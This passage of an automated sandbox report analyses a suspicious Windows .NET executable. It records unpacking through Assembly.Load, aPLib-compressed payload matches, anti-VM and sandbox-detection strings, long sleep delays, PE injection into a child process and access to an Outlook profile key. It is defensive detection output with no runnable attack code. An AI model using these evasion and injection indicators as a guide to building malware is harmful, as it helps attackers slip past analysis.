                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeProcess created: C:\Users\user\Desktop\Conan Fegan - Aluminium.exe C:\Users\user\Desktop\Conan Fegan - Aluminium.exe
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook
                  Source: Conan Fegan - Aluminium.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                  Source: Conan Fegan - Aluminium.exeStatic PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT

                  Data Obfuscation:

                  barindex
                  .NET source code contains potential unpackerShow sources
                  Source: Conan Fegan - Aluminium.exe, BoundHandle.cs.Net Code: .ctor System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                  Source: 0.2.Conan Fegan - Aluminium.exe.960000.0.unpack, BoundHandle.cs.Net Code: .ctor System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                  Source: 0.0.Conan Fegan - Aluminium.exe.960000.0.unpack, BoundHandle.cs.Net Code: .ctor System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                  Source: 5.2.Conan Fegan - Aluminium.exe.c20000.1.unpack, BoundHandle.cs.Net Code: .ctor System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                  Source: 5.0.Conan Fegan - Aluminium.exe.c20000.0.unpack, BoundHandle.cs.Net Code: .ctor System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                  Yara detected aPLib compressed binaryShow sources
                  Source: Yara matchFile source: 00000000.00000002.651632346.0000000003D09000.00000004.00000001.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000005.00000002.900810400.0000000000400000.00000040.00000001.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000000.00000002.651436438.0000000002D01000.00000004.00000001.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: Conan Fegan - Aluminium.exe PID: 7008, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: Conan Fegan - Aluminium.exe PID: 4748, type: MEMORY
                  Source: Yara matchFile source: 0.2.Conan Fegan - Aluminium.exe.3e3d4e0.2.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.Conan Fegan - Aluminium.exe.3eccf90.3.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 5.2.Conan Fegan - Aluminium.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 5.2.Conan Fegan - Aluminium.exe.400000.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.Conan Fegan - Aluminium.exe.3eccf90.3.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.Conan Fegan - Aluminium.exe.2d63264.1.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.Conan Fegan - Aluminium.exe.3dfbac0.4.raw.unpack, type: UNPACKEDPE
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeCode function: 0_2_07A365E8 push esp; retf
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeCode function: 0_2_07A3E9FD push FFFFFF8Bh; iretd
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeCode function: 5_2_00402AC0 push eax; ret
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeCode function: 5_2_00402AC0 push eax; ret
                  Source: initial sampleStatic PE information: section name: .text entropy: 7.26782540442
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeProcess information set: NOGPFAULTERRORBOX
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeProcess information set: NOGPFAULTERRORBOX
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeProcess information set: NOGPFAULTERRORBOX
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeProcess information set: NOGPFAULTERRORBOX
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeProcess information set: NOGPFAULTERRORBOX
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeProcess information set: NOGPFAULTERRORBOX
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeProcess information set: NOGPFAULTERRORBOX
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeProcess information set: NOGPFAULTERRORBOX
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeProcess information set: NOGPFAULTERRORBOX
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeProcess information set: NOGPFAULTERRORBOX
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeProcess information set: NOGPFAULTERRORBOX
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeProcess information set: NOGPFAULTERRORBOX
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeProcess information set: NOGPFAULTERRORBOX
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeProcess information set: NOGPFAULTERRORBOX
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeProcess information set: NOGPFAULTERRORBOX
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeProcess information set: NOGPFAULTERRORBOX
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeProcess information set: NOGPFAULTERRORBOX
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeProcess information set: NOGPFAULTERRORBOX
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeProcess information set: NOGPFAULTERRORBOX
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeProcess information set: NOGPFAULTERRORBOX
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeProcess information set: NOGPFAULTERRORBOX
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeProcess information set: NOGPFAULTERRORBOX
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeProcess information set: NOGPFAULTERRORBOX
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeProcess information set: NOGPFAULTERRORBOX
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeProcess information set: NOGPFAULTERRORBOX
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeProcess information set: NOGPFAULTERRORBOX
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeProcess information set: NOGPFAULTERRORBOX
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeProcess information set: NOGPFAULTERRORBOX
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeProcess information set: NOGPFAULTERRORBOX
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeProcess information set: NOGPFAULTERRORBOX
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeProcess information set: NOGPFAULTERRORBOX
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeProcess information set: NOGPFAULTERRORBOX
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeProcess information set: NOGPFAULTERRORBOX
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeProcess information set: NOGPFAULTERRORBOX
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeProcess information set: NOGPFAULTERRORBOX
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeProcess information set: NOGPFAULTERRORBOX
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeProcess information set: NOGPFAULTERRORBOX
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeProcess information set: NOGPFAULTERRORBOX
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeProcess information set: NOGPFAULTERRORBOX
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeProcess information set: NOGPFAULTERRORBOX
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeProcess information set: NOGPFAULTERRORBOX
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeProcess information set: NOGPFAULTERRORBOX
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeProcess information set: NOGPFAULTERRORBOX
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeProcess information set: NOGPFAULTERRORBOX
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeProcess information set: NOGPFAULTERRORBOX
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeProcess information set: NOGPFAULTERRORBOX
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeProcess information set: NOGPFAULTERRORBOX
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeProcess information set: NOGPFAULTERRORBOX
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeProcess information set: NOGPFAULTERRORBOX
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeProcess information set: NOGPFAULTERRORBOX
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeProcess information set: NOGPFAULTERRORBOX
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeProcess information set: NOGPFAULTERRORBOX
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeProcess information set: NOGPFAULTERRORBOX
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeProcess information set: NOGPFAULTERRORBOX
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeProcess information set: NOGPFAULTERRORBOX
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeProcess information set: NOGPFAULTERRORBOX
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeProcess information set: NOGPFAULTERRORBOX
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeProcess information set: NOGPFAULTERRORBOX
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeProcess information set: NOGPFAULTERRORBOX
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeProcess information set: NOGPFAULTERRORBOX
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeProcess information set: NOGPFAULTERRORBOX
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeProcess information set: NOGPFAULTERRORBOX
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeProcess information set: NOGPFAULTERRORBOX
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeProcess information set: NOGPFAULTERRORBOX
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeProcess information set: NOGPFAULTERRORBOX
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeProcess information set: NOGPFAULTERRORBOX
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeProcess information set: NOGPFAULTERRORBOX
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeProcess information set: NOGPFAULTERRORBOX
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeProcess information set: NOGPFAULTERRORBOX
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeProcess information set: NOGPFAULTERRORBOX
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeProcess information set: NOGPFAULTERRORBOX
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeProcess information set: NOGPFAULTERRORBOX
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeProcess information set: NOGPFAULTERRORBOX
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeProcess information set: NOGPFAULTERRORBOX
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeProcess information set: NOGPFAULTERRORBOX
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeProcess information set: NOGPFAULTERRORBOX
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeProcess information set: NOGPFAULTERRORBOX
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeProcess information set: NOGPFAULTERRORBOX
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeProcess information set: NOGPFAULTERRORBOX
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeProcess information set: NOGPFAULTERRORBOX
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeProcess information set: NOGPFAULTERRORBOX
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeProcess information set: NOGPFAULTERRORBOX
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeProcess information set: NOGPFAULTERRORBOX
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeProcess information set: NOGPFAULTERRORBOX
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeProcess information set: NOGPFAULTERRORBOX
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeProcess information set: NOGPFAULTERRORBOX
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeProcess information set: NOGPFAULTERRORBOX
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeProcess information set: NOGPFAULTERRORBOX
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeProcess information set: NOGPFAULTERRORBOX
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeProcess information set: NOGPFAULTERRORBOX
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeProcess information set: NOGPFAULTERRORBOX
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeProcess information set: NOGPFAULTERRORBOX
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeProcess information set: NOGPFAULTERRORBOX
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeProcess information set: NOGPFAULTERRORBOX
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeProcess information set: NOGPFAULTERRORBOX
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeProcess information set: NOGPFAULTERRORBOX
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeProcess information set: NOGPFAULTERRORBOX
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeProcess information set: NOGPFAULTERRORBOX
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeProcess information set: NOGPFAULTERRORBOX
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeProcess information set: NOGPFAULTERRORBOX
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeProcess information set: NOGPFAULTERRORBOX
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeProcess information set: NOGPFAULTERRORBOX
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeProcess information set: NOGPFAULTERRORBOX
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeProcess information set: NOGPFAULTERRORBOX
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeProcess information set: NOGPFAULTERRORBOX
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeProcess information set: NOGPFAULTERRORBOX
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeProcess information set: NOGPFAULTERRORBOX
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeProcess information set: NOGPFAULTERRORBOX
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeProcess information set: NOGPFAULTERRORBOX
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeProcess information set: NOGPFAULTERRORBOX
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeProcess information set: NOGPFAULTERRORBOX
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeProcess information set: NOGPFAULTERRORBOX
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeProcess information set: NOGPFAULTERRORBOX
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeProcess information set: NOGPFAULTERRORBOX
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeProcess information set: NOGPFAULTERRORBOX

                  Malware Analysis System Evasion:

                  barindex
                  Yara detected AntiVM_3Show sources
                  Source: Yara matchFile source: 00000000.00000002.651436438.0000000002D01000.00000004.00000001.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: Conan Fegan - Aluminium.exe PID: 4748, type: MEMORY
                  Source: Yara matchFile source: 0.2.Conan Fegan - Aluminium.exe.2d63264.1.raw.unpack, type: UNPACKEDPE
                  Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)Show sources
                  Source: Conan Fegan - Aluminium.exe, 00000000.00000002.651436438.0000000002D01000.00000004.00000001.sdmpBinary or memory string: SBIEDLL.DLL
                  Source: Conan Fegan - Aluminium.exe, 00000000.00000002.651436438.0000000002D01000.00000004.00000001.sdmpBinary or memory string: KERNEL32.DLL.WINE_GET_UNIX_FILE_NAME
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeThread delayed: delay time: 922337203685477
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exe TID: 3716Thread sleep time: -103082s >= -30000s
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exe TID: 684Thread sleep time: -922337203685477s >= -30000s
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exe TID: 4600Thread sleep time: -960000s >= -30000s
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeCode function: 5_2_00403D74 FindFirstFileW,FindNextFileW,FindFirstFileW,FindNextFileW,
                  Source: Conan Fegan - Aluminium.exe, 00000000.00000002.651436438.0000000002D01000.00000004.00000001.sdmpBinary or memory string: InstallPathJC:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
                  Source: Conan Fegan - Aluminium.exe, 00000000.00000002.651436438.0000000002D01000.00000004.00000001.sdmpBinary or memory string: vmware
                  Source: Conan Fegan - Aluminium.exe, 00000000.00000002.651436438.0000000002D01000.00000004.00000001.sdmpBinary or memory string: VMware SVGA II
                  Source: Conan Fegan - Aluminium.exe, 00000000.00000002.651436438.0000000002D01000.00000004.00000001.sdmpBinary or memory string: VMWAREDSOFTWARE\VMware, Inc.\VMware Tools
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeCode function: 5_2_0040317B mov eax, dword ptr fs:[00000030h]
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeCode function: 5_2_00402B7C GetProcessHeap,RtlAllocateHeap,
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeProcess token adjusted: Debug
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeMemory allocated: page read and write | page guard

                  HIPS / PFW / Operating System Protection Evasion:

                  barindex
                  Injects a PE file into a foreign processesShow sources
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeMemory written: C:\Users\user\Desktop\Conan Fegan - Aluminium.exe base: 400000 value starts with: 4D5A
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeProcess created: C:\Users\user\Desktop\Conan Fegan - Aluminium.exe C:\Users\user\Desktop\Conan Fegan - Aluminium.exe
                  Source: Conan Fegan - Aluminium.exe, 00000005.00000002.901234801.0000000001810000.00000002.00000001.sdmpBinary or memory string: Program Manager
                  Source: Conan Fegan - Aluminium.exe, 00000005.00000002.901234801.0000000001810000.00000002.00000001.sdmpBinary or memory string: Shell_TrayWnd
                  Source: Conan Fegan - Aluminium.exe, 00000005.00000002.901234801.0000000001810000.00000002.00000001.sdmpBinary or memory string: Progman
                  Source: Conan Fegan - Aluminium.exe, 00000005.00000002.901234801.0000000001810000.00000002.00000001.sdmpBinary or memory string: Progmanlock
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeQueries volume information: C:\Users\user\Desktop\Conan Fegan - Aluminium.exe VolumeInformation
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeQueries volume information: C:\Windows\Fonts\arial.ttf VolumeInformation
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeQueries volume information: C:\Windows\Fonts\ariali.ttf VolumeInformation
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeQueries volume information: C:\Windows\Fonts\arialbd.ttf VolumeInformation
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeQueries volume information: C:\Windows\Fonts\arialbi.ttf VolumeInformation
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeQueries volume information: C:\Windows\Fonts\ARIALN.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeQueries volume information: C:\Windows\Fonts\ariblk.ttf VolumeInformation
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeQueries volume information: C:\Windows\Fonts\ARIALNI.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeQueries volume information: C:\Windows\Fonts\ARIALNB.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeQueries volume information: C:\Windows\Fonts\ARIALNBI.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeQueries volume information: C:\Windows\Fonts\calibri.ttf VolumeInformation
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeQueries volume information: C:\Windows\Fonts\calibril.ttf VolumeInformation
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeQueries volume information: C:\Windows\Fonts\calibrii.ttf VolumeInformation
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeQueries volume information: C:\Windows\Fonts\calibrili.ttf VolumeInformation
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeQueries volume information: C:\Windows\Fonts\calibrib.ttf VolumeInformation
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeQueries volume information: C:\Windows\Fonts\calibriz.ttf VolumeInformation
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeQueries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformation
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeQueries volume information: C:\Windows\Fonts\cambriai.ttf VolumeInformation
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeQueries volume information: C:\Windows\Fonts\cambriab.ttf VolumeInformation
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeQueries volume information: C:\Windows\Fonts\cambriaz.ttf VolumeInformation
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeQueries volume information: C:\Windows\Fonts\Candara.ttf VolumeInformation
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeQueries volume information: C:\Windows\Fonts\Candarai.ttf VolumeInformation
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeQueries volume information: C:\Windows\Fonts\Candarab.ttf VolumeInformation
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeQueries volume information: C:\Windows\Fonts\Candaraz.ttf VolumeInformation
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeQueries volume information: C:\Windows\Fonts\comic.ttf VolumeInformation
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeQueries volume information: C:\Windows\Fonts\comici.ttf VolumeInformation
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeQueries volume information: C:\Windows\Fonts\comicbd.ttf VolumeInformation
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeQueries volume information: C:\Windows\Fonts\comicz.ttf VolumeInformation
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeQueries volume information: C:\Windows\Fonts\consola.ttf VolumeInformation
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeQueries volume information: C:\Windows\Fonts\consolai.ttf VolumeInformation
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeQueries volume information: C:\Windows\Fonts\consolab.ttf VolumeInformation
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeQueries volume information: C:\Windows\Fonts\consolaz.ttf VolumeInformation
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeQueries volume information: C:\Windows\Fonts\constan.ttf VolumeInformation
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeQueries volume information: C:\Windows\Fonts\constani.ttf VolumeInformation
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeQueries volume information: C:\Windows\Fonts\constanb.ttf VolumeInformation
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeQueries volume information: C:\Windows\Fonts\constanz.ttf VolumeInformation
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeQueries volume information: C:\Windows\Fonts\corbel.ttf VolumeInformation
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeQueries volume information: C:\Windows\Fonts\corbeli.ttf VolumeInformation
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeQueries volume information: C:\Windows\Fonts\corbelb.ttf VolumeInformation
